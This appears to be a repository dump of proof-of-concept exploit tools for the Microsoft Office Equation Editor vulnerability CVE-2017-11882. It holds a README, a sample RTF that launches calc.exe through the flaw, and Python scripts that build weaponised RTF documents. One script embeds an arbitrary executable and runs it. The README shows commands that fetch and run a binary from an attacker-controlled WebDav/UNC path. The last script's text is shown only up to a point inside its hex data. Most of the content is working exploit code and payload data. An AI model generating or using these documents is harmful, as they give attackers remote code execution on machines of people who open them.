├── README.md
├── example
    └── exploit.rtf
├── packager_exec_CVE-2017-11882.py
└── webdav_exec_CVE-2017-11882.py


/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2017-11882
 2 | 
 3 | CVE-2017-11882:
 4 | https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882
 5 | 
 6 | MITRE CVE-2017-11882:
 7 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882
 8 | 
 9 | Research:
10 | https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
11 | 
12 | Patch analysis:
13 | https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html
14 | 
15 | DEMO PoC exploitation:
16 | https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410
17 | 
18 | 
19 | 
20 | # webdav_exec CVE-2017-11882
21 | 
22 | A simple PoC for CVE-2017-11882.
23 | This exploit triggers WebClient service to start and execute remote file from attacker-controlled WebDav server.
24 | The reason why this approach might be handy is a limitation of executed command length.
25 | However with help of WebDav it is possible to launch arbitrary attacker-controlled executable on vulnerable machine.
26 | This script creates simple document with several OLE objects.
27 | These objects exploits CVE-2017-11882, which results in sequential command execution.
28 | 
29 | 
30 | The first command which triggers WebClient service start may look like this:
31 | 
32 | ```
33 | cmd.exe /c start \\attacker_ip\ff
34 | ```
35 | 
36 | Attacker controlled binary path should be a UNC network path:
37 | 
38 | ```
39 | \\attacker_ip\ff\1.exe
40 | ```
41 | 
42 | ## Usage
43 | 
44 | ```python
45 | webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name
46 | ```
47 | 
48 | 
49 | # Sample exploit for CVE-2017-11882 (starting calc.exe as payload)
50 | 
51 | `example` folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system.
52 | 


--------------------------------------------------------------------------------
/example/exploit.rtf:
--------------------------------------------------------------------------------
 1 | {\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
 2 | {\*\generator Riched20 6.3.9600}\viewkind4\uc1
 3 | \pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020cea5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006f006d0070004f0062006a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004f0062006a0049006e0066006f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201ffffffff04000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b2710000000000000000000000000000000000000000000000000000000000000000000000000000000003000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4ee5b0000000000030101030a0a01085a5a636d642e657865202f632063616c632e65786520414141414141414141414141414141414141414141414141120c430000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004500710075006100740069006f006e0020004e00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000004000000c5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000d0000004d45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d61746854797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e657720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a600190160a000000313131313131313131310c000000320a6001100f0a000000313131313131313131310c000000320a600190070a000000313131313131313131310c000000320a600110000a000000313131313131313131310a00000026060f000a00ffffffff0100000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff7cef1800040000002d01010004000000f0010000030000000000
 4 | }{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
 5 | 0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
 6 | 0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
 7 | 1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
 8 | 0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
 9 | 0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
10 | 002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
11 | 000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
12 | 0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
13 | 00000000
14 | }}}
15 | \par}
16 | 


--------------------------------------------------------------------------------
/packager_exec_CVE-2017-11882.py:
--------------------------------------------------------------------------------
  1 | import argparse
  2 | import os
  3 | import struct
  4 | 
  5 | class Package(object):
  6 |     """
  7 |     Packager spec based on:
  8 |     https://phishme.com/rtf-malware-delivery/
  9 |     
 10 |     Dropping method by Haifei Li: 
 11 |     https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/
 12 | 
 13 |     Found being used itw by @MalwareParty:
 14 |     https://twitter.com/MalwareParty/status/943861021260861440
 15 |     """
 16 |     def __init__(self, filename):
 17 |         self.filename = os.path.basename(filename)
 18 |         self.fakepath = 'C:\\fakepath\\{}'.format(self.filename)
 19 | 
 20 |         self.orgpath = self.fakepath #"C:\\Users\\IEUser\\Downloads\\{}".format(filename)
 21 |         self.datapath = self.fakepath #"C:\\Users\\IEUser\\AppData\\Local\\Temp\\{}".format(filename)
 22 | 
 23 |         with open(filename,'rb') as f:
 24 |             self.data = f.read()
 25 | 
 26 |         self.OBJ_HEAD = r"{\object\objemb\objw1\objh1{\*\objclass Package}{\*\objdata "
 27 |         self.OBJ_TAIL = r"0105000000000000}}"
 28 | 
 29 |     def get_object_header(self):
 30 |         OLEVersion = '01050000'
 31 |         FormatID = '02000000'
 32 |         ClassName = 'Package'
 33 |         szClassName = struct.pack("<I", len(ClassName) + 1).encode('hex')
 34 |         szPackageData = struct.pack("<I", len(self.get_package_data())/2).encode('hex')
 35 | 
 36 |         return ''.join([
 37 |             OLEVersion,
 38 |             FormatID,
 39 |             szClassName,
 40 |             ClassName.encode('hex') + '00',
 41 |             '00000000',
 42 |             '00000000',
 43 |             szPackageData,
 44 |         ])
 45 | 
 46 |     def get_package_data(self):  
 47 |         StreamHeader = '0200'
 48 |         Label = self.filename.encode('hex') + '00'
 49 |         OrgPath = self.orgpath.encode('hex') + '00'
 50 |         UType = '00000300'
 51 |         DataPath = self.datapath.encode('hex') + '00'
 52 |         DataPathLen = struct.pack("<I", len(self.datapath)+1).encode('hex')
 53 |         DataLen = struct.pack("<I", len(self.data)).encode('hex')
 54 |         Data = self.data.encode('hex')
 55 |         OrgPathWLen = struct.pack("<I", len(self.datapath)).encode('hex')
 56 |         OrgPathW = self.datapath.encode('utf-16le').encode('hex')
 57 |         LabelLen = struct.pack("<I", len(self.filename)).encode('hex')
 58 |         LabelW = self.filename.encode('utf-16le').encode('hex')
 59 |         DefPathWLen = struct.pack("<I", len(self.orgpath)).encode('hex')
 60 |         DefPathW = self.orgpath.encode('utf-16le').encode('hex')
 61 | 
 62 |         return ''.join([
 63 |             StreamHeader,
 64 |             Label,
 65 |             OrgPath,
 66 |             UType,
 67 |             DataPathLen,
 68 |             DataPath,
 69 |             DataLen,
 70 |             Data,
 71 |             OrgPathWLen,
 72 |             OrgPathW,
 73 |             LabelLen,
 74 |             LabelW,
 75 |             DefPathWLen,
 76 |             DefPathW,
 77 |         ])
 78 | 
 79 |     def build_package(self):
 80 |         return self.OBJ_HEAD + self.get_object_header() + self.get_package_data() + self.OBJ_TAIL
 81 | 
 82 | 
 83 | RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
 84 | {\*\generator Riched20 6.3.9600}\viewkind4\uc1
 85 | \pard\sa200\sl276\slmult1\f0\fs22\lang9"""
 86 | 
 87 | 
 88 | RTF_TRAILER = R"""\par}
 89 | """
 90 | 
 91 | 
 92 | OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """
 93 | 
 94 | 
 95 | OBJECT_TRAILER = R"""
 96 | }{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
 97 | 0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
 98 | 0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
 99 | 1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
100 | 0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
101 | 0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
102 | 002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
103 | 000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
104 | 0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
105 | 00000000
106 | }}}
107 | """
108 | 
109 | 
110 | OBJDATA_TEMPLATE = R"""
111 | 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1
112 | b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001
113 | 0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff
114 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
115 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
116 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
117 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
118 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
119 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
120 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
121 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
122 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
123 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
124 | fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe
125 | fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
126 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
127 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
128 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
129 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
130 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
131 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
132 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
133 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
134 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
135 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
136 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
137 | ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000
138 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
139 | 00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000
140 | 000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000
141 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
142 | 00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000
143 | 0000000000000000000000000000000000000000000000000000001400000000000000010043006f
144 | 006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000
145 | 00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000
146 | 00000000000000000000000000000000000000000000000000000000000000010000006600000000
147 | 00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000
148 | 00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff
149 | ffffff00000000000000000000000000000000000000000000000000000000000000000000000003
150 | 0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe
151 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
152 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
153 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
154 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
155 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
156 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
157 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
158 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
159 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
160 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
161 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
162 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
163 | ffffff01000002080000000000000000000000000000000000000000000000000000000000000000
164 | 0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02
165 | ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e
166 | 30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000
167 | 00000000000000000000000000000000000000000000000000000000000000000000000000030004
168 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
169 | 000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4
170 | ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141
171 | 414141414141414141414141414141414141414141120c4300000000000000000000000000000000
172 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
173 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
174 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
175 | 00000000000000000000000000000000000000000000000000000000000000000000004500710075
176 | 006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000
177 | 0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000
178 | 0000000000000000000000000000000000000000000000000000000000000004000000c500000000
179 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
180 | 00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff
181 | ffffff00000000000000000000000000000000000000000000000000000000000000000000000000
182 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
183 | 000000000000000000000000000000000000000000000000000000000000000000000000000000ff
184 | ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000
185 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
186 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
187 | 00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000
188 | 00000000000000000000000000000000000000000000000000000001050000050000000d0000004d
189 | 45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500
190 | 000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00
191 | 050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00
192 | ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468
193 | 54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65
194 | 7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001
195 | 90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131
196 | 0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131
197 | 31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000
198 | 0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff
199 | 7cef1800040000002d01010004000000f0010000030000000000
200 | """
201 | 
202 | 
203 | COMMAND_OFFSET = 0x949*2
204 | 
205 | def create_ole_exec_primitive(command):
206 |     if len(command) > 43:
207 |         raise ValueError("primitive command must be shorter than 43 bytes")
208 |     hex_command = command.ljust(43).encode("hex")
209 |     objdata_hex_stream = OBJDATA_TEMPLATE.translate(None, "\r\n")
210 |     ole_data = objdata_hex_stream[:COMMAND_OFFSET] + hex_command + objdata_hex_stream[COMMAND_OFFSET + len(hex_command):]
211 |     return OBJECT_HEADER + ole_data + OBJECT_TRAILER
212 | 
213 | 
214 | def create_rtf(header, trailer, executable):
215 |     ole1 = create_ole_exec_primitive("cmd.exe /c %temp%\\{}".format(os.path.basename(executable)))
216 |     p = Package(executable)
217 |     package = p.build_package()
218 |     return header + package + ole1 + trailer
219 | 
220 | 
221 | if __name__ == '__main__':
222 |     parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882 using Packager.dll file drop method")
223 |     parser.add_argument("-e", "--executable", help="File to embed and exec", required=True)
224 |     parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
225 | 
226 |     args = parser.parse_args()
227 | 
228 |     rtf_content = create_rtf(RTF_HEADER, RTF_TRAILER, args.executable)
229 | 
230 |     output_file = open(args.output, "w")
231 |     output_file.write(rtf_content)
232 | 
233 |     print "!!! Completed !!!"
234 | 


--------------------------------------------------------------------------------
/webdav_exec_CVE-2017-11882.py:
--------------------------------------------------------------------------------
  1 | import argparse
  2 | 
  3 | 
  4 | RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
  5 | {\*\generator Riched20 6.3.9600}\viewkind4\uc1
  6 | \pard\sa200\sl276\slmult1\f0\fs22\lang9"""
  7 | 
  8 | 
  9 | RTF_TRAILER = R"""\par}
 10 | """
 11 | 
 12 | 
 13 | OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """
 14 | 
 15 | 
 16 | OBJECT_TRAILER = R"""
 17 | }{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
 18 | 0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
 19 | 0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
 20 | 1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
 21 | 0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
 22 | 0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
 23 | 002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
 24 | 000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
 25 | 0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
 26 | 00000000
 27 | }}}
 28 | """
 29 | 
 30 | 
 31 | OBJDATA_TEMPLATE = R"""
 32 | 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1
 33 | b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001
 34 | 0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff
 35 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 36 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 37 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 38 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 39 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 40 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 41 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 42 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 43 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 44 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 45 | fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe
 46 | fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 47 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 48 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 49 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 50 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 51 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 52 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 53 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 54 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 55 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 56 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 57 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 58 | ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000
 59 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 60 | 00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000
 61 | 000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000
 62 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 63 | 00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000
 64 | 0000000000000000000000000000000000000000000000000000001400000000000000010043006f
 65 | 006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000
 66 | 00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000
 67 | 00000000000000000000000000000000000000000000000000000000000000010000006600000000
 68 | 00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000
 69 | 00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff
 70 | ffffff00000000000000000000000000000000000000000000000000000000000000000000000003
 71 | 0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe
 72 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 73 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 74 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 75 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 76 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 77 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 78 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 79 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 80 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 81 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 82 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 83 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 84 | ffffff01000002080000000000000000000000000000000000000000000000000000000000000000
 85 | 0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02
 86 | ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e
 87 | 30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000
 88 | 00000000000000000000000000000000000000000000000000000000000000000000000000030004
 89 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 90 | 000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4
 91 | ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141
 92 | 414141414141414141414141414141414141414141120c4300000000000000000000000000000000
 93 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 94 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 95 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 96 | 00000000000000000000000000000000000000000000000000000000000000000000004500710075
 97 | 006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000
 98 | 0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000
 99 | 0000000000000000000000000000000000000000000000000000000000000004000000c500000000
100 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
101 | 00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff
102 | ffffff00000000000000000000000000000000000000000000000000000000000000000000000000
103 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
104 | 000000000000000000000000000000000000000000000000000000000000000000000000000000ff
105 | ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000
106 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
107 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
